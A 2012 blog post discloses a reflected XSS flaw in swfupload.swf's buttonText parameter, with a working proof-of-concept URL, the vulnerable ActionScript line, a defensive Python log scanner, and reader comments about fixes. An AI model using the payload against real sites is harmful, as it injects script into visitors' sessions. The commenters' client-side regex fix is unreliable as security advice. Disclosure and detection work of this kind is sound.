Sunday, December 9, 2012

swfupload.swf XSS

Hi,

Just want to share my finding,

I found another XSS Vulnerability in swfupload.swf


PoC:

http://demo.swfupload.org/v220/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert%28top.location%29%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E




Vulnerable Parameter:

buttonText

Vulnerable Code:

this.buttonTextField.htmlText = this.buttonText;



(For WordPress fans: works on version 3.3.1 and below.)


Enjoy...
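
A defender's check for the issue above, as an added example that is not part of the original post: it scans web-server access-log lines for requests to swfupload.swf whose decoded buttonText carries markup or a javascript: link. The log lines are constructed, and the function names and the two-level verdict are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not real traffic). The second request is the
# PoC URL from this post; the path is taken from that URL.
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Dec/2012:10:01:02 +0000] "GET /v220/swfupload/swfupload.swf?buttonText=Select+Files HTTP/1.1" 200 12345',
    '203.0.113.9 - - [09/Dec/2012:10:02:11 +0000] "GET /v220/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert%28top.location%29%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E HTTP/1.1" 200 12345',
    '203.0.113.9 - - [09/Dec/2012:10:03:40 +0000] "GET /v220/swfupload/swfupload.swf?buttonText=%3Cb%3EUpload%3C/b%3E HTTP/1.1" 200 12345',
    '198.51.100.7 - - [09/Dec/2012:10:04:05 +0000] "GET /index.php?buttonText=%3Cb%3Ex%3C/b%3E HTTP/1.1" 200 512',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A link whose target is a javascript: URL, as in the PoC.
SCRIPT_LINK = re.compile(r'href\s*=\s*["\']?\s*javascript\s*:', re.I)

def classify(line):
    """Return None, 'markup' or 'script-link' for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/swfupload.swf"):
        return None  # only the Flash movie reads buttonText
    verdict = None
    # parse_qs percent-decodes each value once and turns '+' into a space.
    for value in parse_qs(url.query, keep_blank_values=True).get("buttonText", []):
        if SCRIPT_LINK.search(value):
            return "script-link"
        if "<" in value or ">" in value:
            verdict = "markup"  # HTML reaching htmlText, no script link seen
    return verdict

def scan(lines):
    """Return (client_ip, verdict) for every flagged line."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line.split(" ", 1)[0], verdict))
    return hits

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```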

3 comments:

VariousE said...

Nice one!

Buck said...

How would you go about fixing this?

I don't see that AS3 provides a way to not render HTML in a textField. In AS2 there was a .html configuration boolean property, but it seems to have disappeared. I had hoped assigning to .text would do it, but no luck.

Nir Goldshlager said...

Use Regex (Client Side), Block malicious input,

For example: <, >, etc...


:)
